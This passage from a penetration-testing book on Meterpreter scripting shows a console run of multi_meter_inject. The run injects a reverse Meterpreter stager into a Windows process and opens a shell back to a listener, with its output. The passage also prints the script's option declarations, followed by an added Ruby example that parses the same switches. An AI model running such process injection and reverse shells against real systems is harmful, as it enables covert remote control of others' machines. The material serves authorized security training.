Meterpreter Scripting
237
We’ll inject our new Meterpreter shell into the iexplorer.exe process. This will spawn a second Meterpreter console completely within memory and will never write data to the disk.
Let’s run the multi_meter_inject command using some of the switches we reviewed earlier to see if it works:
meterpreter >
run multi_meter_inject -mp 2808 -mr 172.16.32.129 -p 443
[*] Creating a reverse meterpreter stager: LHOST=172.16.32.129 LPORT=443
[*] Injecting meterpreter into process ID 2808
[*] Allocated memory at address 0x03180000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (749056 bytes) to 172.16.32.170
[+] Successfully injected Meterpreter in to process: 2808
[*] Meterpreter session 3 opened (172.16.32.129:443 -> 172.16.32.170:1098) at Tue Nov 30 22:37:29 -0500 2010
meterpreter >
As this output indicates, our command was successful and a new Meterpreter session has been opened, as shown in the "Meterpreter session 3 opened" line at the end of the output.
Now that you understand what this script can do, let’s examine how it works. We’ll break the script into chunks to help us parse its commands and overall structure.
First, variables and definitions are defined and the flags we want to pass to Meterpreter are set up:
# $Id: multi_meter_inject.rb 10901 2010-11-04 18:42:36Z darkoperator $
# $Revision: 10901 $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-----------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client                                 # the Meterpreter session this script runs in
lhost = Rex::Socket.source_address("1.2.3.4")   # local address of the default outbound interface
lport = 4444                                     # default listener port
lhost = "127.0.0.1"                              # overrides the address computed above (as in the original script)
pid = nil                                        # single target process ID
multi_ip = nil                                   # comma-separated listener IPs from -mr
multi_pid = []                                   # one PID per listener IP from -mp
payload_type = "windows/meterpreter/reverse_tcp" # default payload, overridable with -pt
start_handler = nil                              # set by -m to start a multi/handler
@exec_opts = Rex::Parser::Arguments.new(
  "-h"  => [ false, "Help menu." ],
  "-p"  => [ true,  "The port on the remote host where Metasploit is listening (default: 4444)" ],
  "-m"  => [ false, "Start Exploit multi/handler for return connection" ],
  "-pt" => [ true,  "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp" ],
  "-mr" => [ true,  "Provide Multiple IP Addresses for Connections separated by comma." ],
  "-mp" => [ true,  "Provide Multiple PID for connections separated by comma one per IP." ]
)
meter_type = client.platform                     # platform of the compromised host (e.g., windows)
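To see how the option table above drives the rest of the script, here is an added example that is not part of the book or of the Metasploit project. Because Rex is only available inside the framework, it uses a small hypothetical stand-in class, MiniArgs, that copies just the shape of Rex::Parser::Arguments (a flag-to-[takes_value, description] hash and a parse block yielding opt, index, value). The parse_meter_inject_args helper and its target pairing are assumptions for illustration; the "one PID per IP" rule from the -mp help text is checked explicitly.

```ruby
# Added example, not from the book or from Metasploit. MiniArgs is a
# hypothetical stand-in for Rex::Parser::Arguments; it mimics only the
# constructor shape and the parse(args) { |opt, idx, val| } block interface.
class MiniArgs
  def initialize(fmt)
    @fmt = fmt # { "-flag" => [takes_value?, "help text"] }
  end

  # Yield each recognised flag with its index and value (nil for flag-only options).
  def parse(args)
    i = 0
    while i < args.length
      opt = args[i]
      spec = @fmt[opt]
      raise ArgumentError, "unknown option #{opt}" unless spec
      takes_value, _desc = spec
      val = nil
      if takes_value
        i += 1
        raise ArgumentError, "#{opt} requires a value" if i >= args.length
        val = args[i]
      end
      yield opt, i, val
      i += 1
    end
  end

  # Render the help table the way a script's -h handler would.
  def usage
    @fmt.map { |opt, (_, desc)| "#{opt.ljust(5)} #{desc}" }.join("\n")
  end
end

# The same option table the script declares, in the same format.
EXEC_OPTS = MiniArgs.new(
  "-h"  => [ false, "Help menu." ],
  "-p"  => [ true,  "Port on the remote host where Metasploit is listening (default: 4444)" ],
  "-m"  => [ false, "Start Exploit multi/handler for return connection" ],
  "-pt" => [ true,  "Reverse connection Meterpreter payload (default windows/meterpreter/reverse_tcp)" ],
  "-mr" => [ true,  "Multiple IP addresses for connections, separated by comma" ],
  "-mp" => [ true,  "Multiple PIDs for connections, separated by comma, one per IP" ]
)

# Walk the argument list the way the script does, then pair each listener IP
# with its PID. Enforces the "one per IP" rule stated in the -mp help text.
def parse_meter_inject_args(argv)
  opts = { lport: 4444, payload: "windows/meterpreter/reverse_tcp",
           start_handler: false, help: false, targets: [] }
  ips, pids = [], []
  EXEC_OPTS.parse(argv) do |opt, _idx, val|
    case opt
    when "-h"  then opts[:help] = true
    when "-p"  then opts[:lport] = Integer(val)
    when "-m"  then opts[:start_handler] = true
    when "-pt" then opts[:payload] = val
    when "-mr" then ips  = val.split(",").map(&:strip)
    when "-mp" then pids = val.split(",").map { |p| Integer(p.strip) }
    end
  end
  unless ips.length == pids.length
    raise ArgumentError, "-mr lists #{ips.length} IP(s) but -mp lists #{pids.length} PID(s)"
  end
  opts[:targets] = ips.zip(pids).map { |ip, pid| { lhost: ip, pid: pid } }
  opts
end

if __FILE__ == $0
  # Same switches as the console run shown on the page (constructed input).
  p parse_meter_inject_args(%w[-mp 2808 -mr 172.16.32.129 -p 443])
  puts EXEC_OPTS.usage
end
```

Running it with the switches from the console session yields lport 443 and a single target pairing 172.16.32.129 with PID 2808; passing two IPs with only one PID raises an ArgumentError, which is the kind of input check the real script has to make before it starts building stagers.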